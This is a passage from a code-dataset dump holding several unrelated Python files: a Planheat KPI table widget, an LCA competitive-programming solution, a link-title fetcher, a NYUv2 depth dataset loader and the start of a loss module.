QTableWidgetItem(str(KPIs[\"EN_3.2\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(6, 3, cellr)\n self.tableWidget_5.setItem(6, 4, cellt)\n self.tableWidget_5.setItem(6, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_4.1R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_4.1T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_4.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(7, 3, cellr)\n self.tableWidget_5.setItem(7, 4, cellt)\n self.tableWidget_5.setItem(7, 5, cell)\n\n cellr = QTableWidgetItem(self.round_to_string(KPIs[\"EN_4.2R\"]))\n cellt = QTableWidgetItem(self.round_to_string(KPIs[\"EN_4.2T\"]))\n cell = QTableWidgetItem(self.round_to_string(KPIs[\"EN_4.2\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(8, 3, cellr)\n self.tableWidget_5.setItem(8, 4, cellt)\n self.tableWidget_5.setItem(8, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_5.1R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_5.1T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_5.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(9, 3, cellr)\n self.tableWidget_5.setItem(9, 4, cellt)\n self.tableWidget_5.setItem(9, 5, cell)\n\n cellr = QTableWidgetItem('{:.2f}'.format(KPIs[\"EN_5.2R\"]))\n cellt = QTableWidgetItem('{:.2f}'.format(KPIs[\"EN_5.2T\"]))\n cell = QTableWidgetItem('{:.2f}'.format(KPIs[\"EN_5.2\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(10, 3, cellr)\n self.tableWidget_5.setItem(10, 4, cellt)\n self.tableWidget_5.setItem(10, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_6.1R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_6.1T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_6.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(11, 3, cellr)\n self.tableWidget_5.setItem(11, 4, cellt)\n self.tableWidget_5.setItem(11, 5, cell)\n\n cellr = QTableWidgetItem(self.round_to_string(KPIs[\"EN_6.2R\"]))\n cellt = QTableWidgetItem(self.round_to_string(KPIs[\"EN_6.2T\"]))\n cell = QTableWidgetItem(self.round_to_string(KPIs[\"EN_6.2\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(12, 3, cellr)\n self.tableWidget_5.setItem(12, 4, cellt)\n self.tableWidget_5.setItem(12, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_7.1R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_7.1T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_7.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(13, 3, cellr)\n self.tableWidget_5.setItem(13, 4, cellt)\n self.tableWidget_5.setItem(13, 5, cell)\n\n cellr = QTableWidgetItem(self.round_to_string(KPIs[\"EN_7.2R\"]))\n cellt = QTableWidgetItem(self.round_to_string(KPIs[\"EN_7.2T\"]))\n cell = QTableWidgetItem(self.round_to_string(KPIs[\"EN_7.2\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(14, 3, cellr)\n self.tableWidget_5.setItem(14, 4, cellt)\n self.tableWidget_5.setItem(14, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_9.1R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_9.1T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_9.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(15, 3, cellr)\n self.tableWidget_5.setItem(15, 4, cellt)\n self.tableWidget_5.setItem(15, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_11.1R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_11.1T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_11.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(16, 3, cellr)\n self.tableWidget_5.setItem(16, 4, cellt)\n self.tableWidget_5.setItem(16, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_11.2R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_11.2T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_11.2\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(17, 3, cellr)\n self.tableWidget_5.setItem(17, 4, cellt)\n self.tableWidget_5.setItem(17, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_12.1R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_12.1T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_12.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(18, 3, cellr)\n self.tableWidget_5.setItem(18, 4, cellt)\n self.tableWidget_5.setItem(18, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_13.1R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_13.1T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_13.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(19, 3, cellr)\n self.tableWidget_5.setItem(19, 4, cellt)\n self.tableWidget_5.setItem(19, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_13.1bR\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_13.1bT\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_13.1b\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(20, 3, cellr)\n self.tableWidget_5.setItem(20, 4, cellt)\n self.tableWidget_5.setItem(20, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_14.1R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_14.1T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_14.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(21, 3, cellr)\n self.tableWidget_5.setItem(21, 4, cellt)\n self.tableWidget_5.setItem(21, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_14.1bR\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_14.1bT\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_14.1b\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(22, 3, cellr)\n self.tableWidget_5.setItem(22, 4, cellt)\n self.tableWidget_5.setItem(22, 5, cell)\n self.tableWidget_5.setItem(22, 5, cell)\n\n cellr = QTableWidgetItem(\"Nan\")\n cellt = QTableWidgetItem(\"Nan\")\n cell = QTableWidgetItem(\"Nan\")\n # cellr = QTableWidgetItem(str(KPIs[\"EN_15.1R\"]))\n # cellt = QTableWidgetItem(str(KPIs[\"EN_15.1T\"]))\n # cell = QTableWidgetItem(str(KPIs[\"EN_15.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(23, 3, cellr)\n self.tableWidget_5.setItem(23, 4, cellt)\n self.tableWidget_5.setItem(23, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"ENV_1.3R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"ENV_1.3T\"]))\n cell = QTableWidgetItem(str(KPIs[\"ENV_1.3\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_2.setItem(1, 3, cellr)\n self.tableWidget_2.setItem(1, 4, cellt)\n self.tableWidget_2.setItem(1, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"ENV_1.4R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"ENV_1.4T\"]))\n cell = QTableWidgetItem(str(KPIs[\"ENV_1.4\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_2.setItem(2, 3, cellr)\n self.tableWidget_2.setItem(2, 4, cellt)\n self.tableWidget_2.setItem(2, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"ENV_2.1R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"ENV_2.1T\"]))\n cell = QTableWidgetItem(str(KPIs[\"ENV_2.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_2.setItem(3, 3, cellr)\n self.tableWidget_2.setItem(3, 4, cellt)\n self.tableWidget_2.setItem(3, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"ENV_2.2R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"ENV_2.2T\"]))\n cell = QTableWidgetItem(str(KPIs[\"ENV_2.2\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_2.setItem(4, 3, cellr)\n self.tableWidget_2.setItem(4, 4, cellt)\n self.tableWidget_2.setItem(4, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"ENV_2.7R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"ENV_2.7T\"]))\n cell = QTableWidgetItem(str(KPIs[\"ENV_2.7\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_2.setItem(5, 3, cellr)\n self.tableWidget_2.setItem(5, 4, cellt)\n self.tableWidget_2.setItem(5, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"ENV_2.8R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"ENV_2.8T\"]))\n cell = QTableWidgetItem(str(KPIs[\"ENV_2.8\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_2.setItem(6, 3, cellr)\n self.tableWidget_2.setItem(6, 4, cellt)\n self.tableWidget_2.setItem(6, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"ENV_2.13R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"ENV_2.13T\"]))\n cell = QTableWidgetItem(str(KPIs[\"ENV_2.13\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_2.setItem(7, 3, cellr)\n self.tableWidget_2.setItem(7, 4, cellt)\n self.tableWidget_2.setItem(7, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"ENV_2.14R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"ENV_2.14T\"]))\n cell = QTableWidgetItem(str(KPIs[\"ENV_2.14\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_2.setItem(8, 3, cellr)\n self.tableWidget_2.setItem(8, 4, cellt)\n self.tableWidget_2.setItem(8, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"SO_3.1R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"SO_3.1T\"]))\n cell = QTableWidgetItem(str(KPIs[\"SO_3.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_4.setItem(4, 3, cellr)\n self.tableWidget_4.setItem(4, 4, cellt)\n self.tableWidget_4.setItem(4, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"ECO_2.1R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"ECO_2.1T\"]))\n cell = QTableWidgetItem(str(KPIs[\"ECO_2.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_3.setItem(5, 3, cellr)\n self.tableWidget_3.setItem(5, 4, cellt)\n self.tableWidget_3.setItem(5, 5, cell)\n\n print(\"KPIs done!\")\n self.stop_progress_bar.emit()\n\n\n def set_up_simulator(self):\n self.simulator = DistrictSimulator()\n self.simulator.DHN_network_list = self.DHN_network_list\n self.simulator.DCN_network_list = self.DCN_network_list\n\n self.simulator.sources_tab = self.baseline_sources_table\n self.simulator.ef_sources_tab = self.baseline_sources_table\n print(\"Step2_dockwidget.set_up_simulator: self.baseline_sources_table, self.simulator.sources_tab, self.simulator.ef_sources_tab\",\n self.baseline_sources_table, self.simulator.sources_tab, self.simulator.ef_sources_tab)\n self.simulator.sources = self.sources\n self.simulator.step1_network_tree_widget = self.step1.dmmTreeNetwork\n self.simulator.step1_building_tree_widget = self.step1.dmmTree\n self.simulator.step0_district_sources_tab = self.step0.sources_available\n self.simulator.step4_network_tree_widget = None\n self.simulator.step4_building_tree_widget = None\n\n self.simulator.logger = self.logger\n\n self.simulator.baseline_scenario = self.baseline_scenario\n self.simulator.future_scenario = None\n\n self.simulator.baseline_KPIs = None\n self.simulator.KPIs_additional_data = self.step1.KPIs_additional_data\n\n self.simulator.heat = self.heat\n self.simulator.temperature = self.temperature\n\n self.simulator.set_up_new_simulation()\n\n def get_area(self, building_id):\n expr = QgsExpression(\"BuildingID=\" + building_id)\n if self.baseline_scenario is None:\n\n return\n fs = [ft for ft in self.baseline_scenario.getFeatures(QgsFeatureRequest(expr))]\n if len(fs) > 0:\n feature_0 = fs[0]\n else:\n return 0\n return feature_0.geometry().area()\n\n def sum_file(self, file, column=0, separator=\";\"):\n total = 0.0\n try:\n with open(file) as fp:\n for i, line in enumerate(fp):\n total = total + float(line.split(separator)[column])\n except:\n print(\"file\", file, \"column\", column, \"separator\", separator)\n return 0.0\n return total\n\n def get_source_infos(self, widget, source):\n for i in range(widget.rowCount()):\n if widget.verticalHeaderItem(i).text() == source:\n try:\n return [float(widget.item(i, 0).text()),\n float(widget.item(i, 1).text())]\n except:\n print(\"Step2_dockwidget.py, get_source_infos: impossible to get row\", i)\n return [0, 0]\n\n def remove_files(self, dr, start):\n if not os.path.isdir(dr):\n return\n for f in os.listdir(dr):\n fn = os.fsdecode(f)\n if fn.startswith(start):\n os.remove(os.path.join(dr, fn))\n\n\n def set_up_logger(self):\n class Printer:\n def write(self, x):\n print(x)\n\n self.logger = logging.getLogger()\n self.logger.setLevel(logging.INFO)\n\n output_stream = sys.stdout if sys.stdout is not None else Printer()\n stream_handler = logging.StreamHandler(output_stream)\n formatter = logging.Formatter('%(asctime)s :: %(levelname)s :: %(message)s')\n stream_handler.setFormatter(formatter)\n stream_handler.setLevel(logging.DEBUG)\n self.logger.addHandler(stream_handler)\n\n def reset_tech_info_to_0(self, tech_info=None):\n if tech_info is None:\n tech_info = self.create_base_tech_infos()\n tech_info = self.reset_tech_info_to_0(tech_info=tech_info)\n return tech_info\n else:\n for key in tech_info.keys():\n tech_info[key] = 0\n return tech_info\n\n def receive_widget(self, widget, sources, dhn, dcn):\n self.baseline_buildings_widget = widget\n self.baseline_sources_table = sources\n self.DHN_network_list = dhn\n self.DCN_network_list = dcn\n print(\"Step2.py, receive_widget(). DHN and DCN\", [n.name for n in self.DHN_network_list],\n [n.name for n in self.DCN_network_list])\n print(\"Step2.py, receive_widget(). widget, sources:\", widget, sources)\n\n def receive_baseline_scenario(self, layer):\n self.baseline_scenario = layer\n\n def get_step0_data(self, heat, temperature):\n self.heat = heat\n self.temperature = temperature\n\n def round_to_string(self, in_value):\n try:\n return str(round(float(in_value), 2))\n except:\n return \"Nan\"\n\n","repo_name":"Planheat/Planheat-Tool","sub_path":"planning_and_simulation_modules/Step2_docwidget.py","file_name":"Step2_docwidget.py","file_ext":"py","file_size_in_byte":29840,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"31650135128","text":"# oj t -c \"python main.py\" -d \"./tests/\" \n\n# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\n# import sys\n# read = sys.stdin.buffer.read\n# readline = sys.stdin.buffer.readline\n# readlines = sys.stdin.buffer.readlines\n\n# 検討?分 実装分 バグとり分\n\n# import sys\n# import os\n# f = open('../../../input.txt', 'r')\n# sys.stdin = f\n\n# doubling\nclass LCA():\n def __init__(self, links, root):\n self.n = len(links)\n self.dbl = [[-1] for _ in range(self.n)]\n self.depth = [-1] * self.n\n self.depth[root] = 0\n self.order = []\n stack = [root]\n while stack:\n i = stack.pop()\n self.order.append(i)\n for j in links[i]:\n if self.depth[j] != -1:\n continue\n self.depth[j] = self.depth[i] + 1\n self.dbl[j][0] = i\n stack.append(j)\n \n self.log_d = (max(self.depth)).bit_length()\n for j in range(self.log_d - 1):\n for i in range(self.n):\n ancestor = self.dbl[i][j]\n self.dbl[i].append(self.dbl[ancestor][j])\n \n def lca(self, x, y):\n assert (self.depth[x] >= 0) and (self.depth[y] >= 0)\n if(self.depth[x] < self.depth[y]):\n x,y = y,x\n dif = self.depth[x] - self.depth[y]\n for bi in range(self.log_d):\n if(dif >> bi)&1:\n x = self.dbl[x][bi]\n \n if(x == y):\n return x\n for bi in range(self.log_d-1, -1, -1):\n if(self.dbl[x][bi] != self.dbl[y][bi]):\n x = self.dbl[x][bi]\n y = self.dbl[y][bi]\n return self.dbl[x][0]\n\nimport sys\nread = sys.stdin.buffer.read\n\nn,*data = map(int,read().split())\nab = data[:2*(n-1)]\nq = data[2*(n-1)]\nkv = data[2*(n-1)+1:]\n\nlinks = [[] for _ in range(n)]\nit = iter(ab)\nfor a,b in zip(it,it):\n a -= 1\n b -= 1\n links[a].append(b)\n links[b].append(a)\n\nlca = LCA(links, 0)\nsort_num = [0] * n\nfor i,oi in enumerate(lca.order):\n sort_num[oi] = i\n\nans = []\nidx = 0\nfor _ in range(q):\n k = kv[idx]\n v = [i-1 for i in kv[idx+1:idx+1+k]]\n idx += 1+k\n\n v.sort(key=lambda x: sort_num[x])\n \n tmp = 0\n for i in range(k):\n x = v[i-1]\n y = v[i]\n lca_xy = lca.lca(x,y)\n tmp += lca.depth[x] + lca.depth[y] - lca.depth[lca_xy] * 2\n \n tmp //= 2\n ans.append(tmp)\n\nprint('\\n'.join(map(str,ans)))\n\n\n\n","repo_name":"komajun365/competitive_programming","sub_path":"others/typical90/035/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74316447206","text":"import shelve\n\nimport wc\nfrom bs4 import BeautifulSoup as BS\nimport requests\n\n\nchecks = [\n wc.is_instapaper,\n wc.is_tw_action,\n wc.is_unsubscribe,\n]\n\nwith shelve.open('wc.db', writeback=True) as db:\n if 'rich_links' not in db:\n db['rich_links'] = {}\n\n for link in db['links'] :\n if not any(check(link) for check in checks):\n resp = requests.get(link)\n soup = BS(resp.text, 'html.parser')\n db['rich_links'][link] = {\n 'url': link,\n 'title': soup.title.text,\n }\n db.sync()\n","repo_name":"abele/weekly-compressor","sub_path":"addmeta.py","file_name":"addmeta.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"6162430861","text":"from pathlib import Path\r\nimport json\r\nfrom network_utils import gradient\r\nimport numpy as np\r\nimport torch\r\nfrom torch.utils.data import Dataset\r\nfrom torchvision.transforms import InterpolationMode\r\nfrom PIL import Image\r\nfrom .utils import downsample, bicubic_with_mask, random_crop, random_rotate, random_horizontal_flip\r\n\r\n\r\nclass NYUv2Dataset256(Dataset):\r\n\r\n def __init__(\r\n self,\r\n root='/home/qiaoxin/prj/Qiao/dataset/NYUDepthv2',\r\n crop_size=(256, 256),\r\n do_horizontal_flip=True,\r\n max_rotation_angle=0,\r\n rotation_interpolation=InterpolationMode.BILINEAR,\r\n image_transform=None,\r\n depth_transform=None,\r\n in_memory=False,\r\n split='test',\r\n crop_valid=True,\r\n crop_deterministic=True,\r\n scaling=8,\r\n **kwargs\r\n ):\r\n self.crop_size = crop_size\r\n self.do_horizontal_flip = do_horizontal_flip\r\n self.max_rotation_angle = max_rotation_angle\r\n self.rotation_interpolation = rotation_interpolation\r\n self.image_transform = image_transform\r\n self.depth_transform = depth_transform\r\n self.crop_valid = crop_valid\r\n self.crop_deterministic = crop_deterministic\r\n self.scaling = scaling\r\n\r\n import h5py\r\n file = h5py.File(Path(root) / 'nyu_depth_v2_labeled.mat')\r\n\r\n with open(Path(root) / 'split_idc.json') as fh:\r\n self.split_idc = np.array(json.load(fh)[split])\r\n\r\n if max_rotation_angle > 0 and crop_deterministic:\r\n raise ValueError('Max rotation angle has to be zero when cropping deterministically')\r\n\r\n self.images = np.array(file['images']) if in_memory else file['images']\r\n self.depth_maps = np.array(file['depths']) if in_memory else file['depths']\r\n self.instances = np.array(file['instances']) if in_memory else file['instances']\r\n self.labels = np.array(file['labels']) if in_memory else file['labels']\r\n\r\n self.W, self.H = self.images.shape[2:]\r\n\r\n # if self.crop_valid:\r\n # if self.max_rotation_angle > 45:\r\n # raise ValueError('When crop_valid=True, only rotation angles up to 45° are supported for now')\r\n #\r\n # # make sure that max rotation angle is valid, else decrease\r\n # max_angle = np.floor(min(\r\n # 2 * np.arctan((np.sqrt(-(crop_size[0] ** 2) + self.H ** 2 + self.W ** 2) - self.W) / (crop_size[0] + self.H)),\r\n # 2 * np.arctan((np.sqrt(-(crop_size[1] ** 2) + self.W ** 2 + self.H ** 2) - self.H) / (crop_size[1] + self.W))\r\n # ) * (180. / np.pi))\r\n #\r\n # if self.max_rotation_angle > max_angle:\r\n # print(f'Max rotation angle too large for given image size and crop size, decreased to {max_angle}')\r\n # self.max_rotation_angle = max_angle\r\n\r\n def __getitem__(self, index):\r\n if self.crop_deterministic:\r\n num_crops_h, num_crops_w = self.H // self.crop_size[0], self.W // self.crop_size[1]\r\n im_index = self.split_idc[index // (num_crops_h * num_crops_w)]\r\n else:\r\n im_index = self.split_idc[index]\r\n\r\n image = self.images[im_index].astype('float32').T\r\n depth_map = self.depth_maps[im_index].astype('float32').T\r\n instances = self.instances[im_index].astype('int16').T\r\n labels = self.labels[im_index].astype('int16').T\r\n image, depth_map, instances, labels = image.copy(), depth_map.copy(), instances.copy(), labels.copy()\r\n\r\n outputs = [image, depth_map, instances, labels]\r\n\r\n # if self.do_horizontal_flip and not self.crop_deterministic:\r\n # outputs = random_horizontal_flip(outputs)\r\n #\r\n # if self.max_rotation_angle > 0 and not self.crop_deterministic:\r\n # outputs = random_rotate(outputs, self.max_rotation_angle, self.rotation_interpolation,\r\n # crop_valid=self.crop_valid)\r\n # # passing fill=np.nan to rotate sets all pixels to nan, so set it here explicitly\r\n # outputs[1][outputs[1] == 0.] = np.nan\r\n\r\n if self.crop_deterministic:\r\n crop_index = index % (num_crops_h * num_crops_w)\r\n crop_index_h, crop_index_w = crop_index // num_crops_w, crop_index % num_crops_w\r\n slice_h = slice(crop_index_h * self.crop_size[0], (crop_index_h + 1) * self.crop_size[0])\r\n slice_w = slice(crop_index_w * self.crop_size[1], (crop_index_w + 1) * self.crop_size[1])\r\n outputs = [o[slice_h, slice_w] for o in outputs]\r\n else:\r\n outputs = random_crop(outputs, self.crop_size)\r\n\r\n # # apply user transforms\r\n # if self.image_transform is not None:\r\n # outputs[0] = self.image_transform(outputs[0])\r\n # if self.depth_transform is not None:\r\n # outputs[1] = self.depth_transform(outputs[1])\r\n\r\n image = outputs[0]\r\n depth_map = outputs[1]\r\n # print('depth_map:', depth_map.shape)\r\n\r\n h, w = image.shape[:2]\r\n # source = downsample(depth_map.unsqueeze(0), self.scaling).squeeze().unsqueeze(0)\r\n source = np.array(Image.fromarray(depth_map).resize((w//self.scaling, h//self.scaling), Image.BICUBIC)) # bicubic, RMSE=7.13\r\n\r\n # 梯度图\r\n depth_grad = gradient(depth_map)\r\n\r\n # normalize\r\n depth_min = np.nanmin(depth_map)\r\n depth_max = np.nanmax(depth_map)\r\n depth_map = (depth_map - depth_min) / (depth_max - depth_min) # torch.Size([1, 256, 256])\r\n source = (source - depth_min) / (depth_max - depth_min)\r\n depth_grad = depth_grad / (depth_max - depth_min)\r\n\r\n image = image.astype(np.float32).transpose(2, 0, 1) / 255\r\n image = (image - np.array([0.485, 0.456, 0.406]).reshape(3,1,1)) / np.array([0.229, 0.224, 0.225]).reshape(3,1,1)\r\n\r\n y_bicubic = np.array(Image.fromarray(source).resize((w, h), Image.BICUBIC))\r\n\r\n source = torch.from_numpy(source).unsqueeze(0).float()\r\n y_bicubic = torch.from_numpy(y_bicubic).unsqueeze(0).float()\r\n image = torch.from_numpy(image).float()\r\n depth_map = torch.from_numpy(depth_map).unsqueeze(0).float()\r\n depth_grad = torch.from_numpy(depth_grad).unsqueeze(0).float()\r\n\r\n mask_hr = (~torch.isnan(depth_map)).float()\r\n mask_lr = (~torch.isnan(source)).float()\r\n mask_grad = (~torch.isnan(depth_grad)).float()\r\n mask_hr = (mask_hr*mask_grad) # torch.Size([1, 256, 256])\r\n\r\n depth_map[mask_hr == 0.] = 0.\r\n depth_grad[mask_hr == 0.] = 0.\r\n source[mask_lr == 0.] = 0.\r\n\r\n return {'image': image, 'hr': depth_map, 'mask_hr': mask_hr, 'mask_lr': mask_lr, 'idx': index,\r\n 'lr': y_bicubic, 'grad': depth_grad, 'max': depth_max * 100, 'min': depth_min * 100}\r\n\r\n def __len__(self):\r\n if self.crop_deterministic:\r\n return len(self.split_idc) * (self.H // self.crop_size[0]) * (self.W // self.crop_size[1])\r\n return len(self.split_idc)\r\n","repo_name":"wudiqx106/DSR-EI","sub_path":"datasets/nyu256.py","file_name":"nyu256.py","file_ext":"py","file_size_in_byte":7115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72472763367","text":"from attrs import define, field\nimport torch\nfrom torch.nn import functional as F\n\n\nclass MaskedAR:\n def __init__(self):\n self.xent = nn.CrossEntropyLoss(reduction=\"none\")\n\n def train_and_metrics(self, batch, logits):\n return (\n (self.xent(logits.permute(0, 2, 1), batch.targets) * batch.mask).mean(),\n {},\n )\n\n\n@define(slots=False)\nclass PolicyValue:\n v_weight: float = 1.0\n policy_weight: float = 1.0\n\n def loss_and_metrics(self, batch, logits):\n v_logits = logits[\"values\"]\n m_logits = logits[\"moves\"]\n\n v_error = F.mse_loss(v_logits, batch.values)\n\n metrics = {\n \"v_error\": v_error.item(),\n 